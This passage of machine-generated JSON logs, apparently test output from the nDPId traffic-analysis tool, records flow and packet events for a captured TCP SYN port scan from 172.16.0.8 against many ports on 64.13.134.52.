-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":231,"source":"synscan.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAs05oAADgGPNisEAAIQA2GNIzTBi\/dU4MZAAAAAGACBAAuXQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":232,"source":"synscan.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27355,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"synscan.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/+QAADUGE46sEAAIQA2GNIzTatvdU4MZAAAAAGACCADFsAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":233,"source":"synscan.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"synscan.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsD6EAADkG\/9GsEAAIQA2GNIzTJqrdU4MZAAAAAGACCAAJ4gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":234,"source":"synscan.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5825,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"synscan.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsihkAACcGl1msEAAIQA2GNIzTFsHdU4MZAAAAAGACEAARywAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":235,"source":"synscan.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1641,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"synscan.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsQFEAADgG0CGsEAAIQA2GNIzTBmndU4MZAAAAAGACBAAuIwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":236,"source":"synscan.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"synscan.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAs+A4AACkGJ2SsEAAIQA2GNIzTgADdU4MZAAAAAGACCACwiwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"synscan.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9575,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"synscan.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsyBsAADAGUFesEAAIQA2GNIzTJWfdU4MZAAAAAGACBAAPJQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":238,"source":"synscan.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1043,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"synscan.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsr+YAAC4GaoysEAAIQA2GNIzTBBPdU4MZAAAAAGACDAAoeQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":239,"source":"synscan.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"synscan.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsVHsAAC4GxfesEAAIQA2GNIzTD6DdU4MZAAAAAGACDAAc7AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":240,"source":"synscan.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058406,"flow_last_seen":1278275058406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058406,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":240,"source":"synscan.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":1278275058406,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058406,"pkt":"ACYLMQczACWzv5HuCABFAAAsv0EAADsGTjGsEAAIQA2GNIzTBZndU4MZAAAAAGACEAAi8wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":241,"source":"synscan.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058406,"flow_last_seen":1278275058406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058406,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6669,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"synscan.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":1,"flow_last_seen":1278275058406,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058406,"pkt":"ACYLMQczACWzv5HuCABFAAAsnBAAADUGd2KsEAAIQA2GNIzTGg3dU4MZAAAAAGACCAAWfwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":242,"source":"synscan.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"synscan.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAssvkAAC0GaHmsEAAIQA2GNIzTI2\/dU4MZAAAAAGACCAANHQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":243,"source":"synscan.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":243,"source":"synscan.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsYaYAACsGu8ysEAAIQA2GNIzTIzLdU4MZAAAAAGACEAAFWgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":244,"source":"synscan.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":765,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":244,"source":"synscan.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsqmkAAC8GbwmsEAAIQA2GNIzTAv3dU4MZAAAAAGACEAAljwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":245,"source":"synscan.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":245,"source":"synscan.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsJaUAACsG982sEAAIQA2GNIzTCDPdU4MZAAAAAGACEAAgWQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":246,"source":"synscan.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8649,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":246,"source":"synscan.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAs0Q0AADYGQWWsEAAIQA2GNIzTIcndU4MZAAAAAGACDAAKwwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":247,"source":"synscan.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":247,"source":"synscan.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsN7MAACsG5b+sEAAIQA2GNIzTBFfdU4MZAAAAAGACEAAkNQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":248,"source":"synscan.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1064,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":248,"source":"synscan.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsBlAAADkGCSOsEAAIQA2GNIzTBCjdU4MZAAAAAGACCAAsZAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":249,"source":"synscan.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"synscan.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsHiIAACwG\/lCsEAAIQA2GNIzTBEfdU4MZAAAAAGACBAAwRQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":250,"source":"synscan.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"synscan.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsYccAAC4GuKusEAAIQA2GNIzTE6ndU4MZAAAAAGACDAAY4wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":251,"source":"synscan.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":251,"source":"synscan.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAswmkAADEGVQmsEAAIQA2GNIzTC\/\/dU4MZAAAAAGACCAAkjQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"synscan.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6543,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"synscan.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsPAwAACwG4GasEAAIQA2GNIzTGY\/dU4MZAAAAAGACBAAa\/QAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":253,"source":"synscan.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":808,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"synscan.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsbAwAADAGrGasEAAIQA2GNIzTAyjdU4MZAAAAAGACBAAxZAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"synscan.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"synscan.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsBZkAACgGGtqsEAAIQA2GNIzTd\/7dU4MZAAAAAGACBAC8jQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":255,"source":"synscan.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"synscan.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAs4HIAADEGNwCsEAAIQA2GNIzTBC\/dU4MZAAAAAGACCAAsXQAAAgQFtA=="} 